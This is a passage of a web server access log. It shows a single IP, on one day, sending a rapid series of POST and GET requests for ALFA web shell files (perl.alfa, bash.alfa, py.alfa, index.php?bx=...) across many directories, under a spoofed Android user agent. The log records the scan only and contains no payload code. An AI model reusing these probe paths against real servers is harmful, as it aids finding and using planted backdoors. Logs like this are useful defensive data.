HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:48 -0400] "POST /.well-known/pki-validation/alfacgiapi/perl.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:48 -0400] "POST /.well-known/pki-validation/alfacgiapi/perl.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:48 -0400] "POST /.well-known/pki-validation/alfacgiapi/bash.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:48 -0400] "POST /.well-known/pki-validation/alfacgiapi/bash.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:48 -0400] "POST /.well-known/pki-validation/alfacgiapi/py.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:48 -0400] "POST /.well-known/pki-validation/alfacgiapi/py.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:48 -0400] "GET /.well-known/pki-validation/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:49 -0400] "GET /.well-known/pki-validation/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:49 -0400] "GET /.well-known/pki-validation/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "POST /.well-known/pki-validation/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "POST /.well-known/pki-validation/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "POST /.well-known/pki-validation/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "POST /.well-known/pki-validation/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "POST /.well-known/pki-validation/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "POST /.well-known/pki-validation/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "GET /.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "GET /.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:56 -0400] "GET /.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:59 -0400] "POST /.tmb/alfacgiapi/perl.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:59 -0400] "POST /.tmb/alfacgiapi/perl.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:59 -0400] "POST /.tmb/alfacgiapi/bash.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:59 -0400] "POST /.tmb/alfacgiapi/bash.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:02:59 -0400] "POST /.tmb/alfacgiapi/py.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:00 -0400] "POST /.tmb/alfacgiapi/py.alfa HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:00 -0400] "GET /.tmb/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:00 -0400] "GET /.tmb/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:00 -0400] "GET /.tmb/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:02 -0400] "POST /.tmb/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:02 -0400] "POST /.tmb/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:02 -0400] "POST /.tmb/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:02 -0400] "POST /.tmb/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:02 -0400] "POST /.tmb/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:03 -0400] "POST /.tmb/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:03 -0400] "GET /.tmb/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:03 -0400] "GET /.tmb/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:03 -0400] "GET /.tmb/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:04 -0400] "POST /.quarantine/alfacgiapi/perl.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:04 -0400] "POST /.quarantine/alfacgiapi/perl.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:04 -0400] "POST /.quarantine/alfacgiapi/bash.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:05 -0400] "POST /.quarantine/alfacgiapi/bash.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:05 -0400] "POST /.quarantine/alfacgiapi/py.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:05 -0400] "POST /.quarantine/alfacgiapi/py.alfa HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:05 -0400] "GET /.quarantine/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:05 -0400] "GET /.quarantine/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:06 -0400] "GET /.quarantine/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:14 -0400] "POST /.quarantine/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:14 -0400] "POST /.quarantine/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:14 -0400] "POST /.quarantine/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:14 -0400] "POST /.quarantine/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:15 -0400] "POST /.quarantine/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:15 -0400] "POST /.quarantine/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:15 -0400] "GET /.quarantine/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:15 -0400] "GET /.quarantine/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:15 -0400] "GET /.quarantine/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:18 -0400] "POST /cgi-bin/alfacgiapi/perl.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:18 -0400] "POST /cgi-bin/alfacgiapi/perl.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:18 -0400] "POST /cgi-bin/alfacgiapi/bash.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:18 -0400] "POST /cgi-bin/alfacgiapi/bash.alfa HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:18 -0400] "POST /cgi-bin/alfacgiapi/py.alfa HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:19 -0400] "POST /cgi-bin/alfacgiapi/py.alfa HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:19 -0400] "GET /cgi-bin/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:19 -0400] "GET /cgi-bin/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:19 -0400] "GET /cgi-bin/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:24 -0400] "POST /cgi-bin/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:24 -0400] "POST /cgi-bin/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:25 -0400] "POST /cgi-bin/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:25 -0400] "POST /cgi-bin/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:25 -0400] "POST /cgi-bin/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:25 -0400] "POST /cgi-bin/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:26 -0400] "GET /cgi-bin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:26 -0400] "GET /cgi-bin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:26 -0400] "GET /cgi-bin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 282 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:29 -0400] "POST /images/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:29 -0400] "POST /images/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:29 -0400] "POST /images/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:29 -0400] "POST /images/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:29 -0400] "POST /images/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:29 -0400] "POST /images/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:30 -0400] "GET /images/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:03:30 -0400] "GET /images/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - 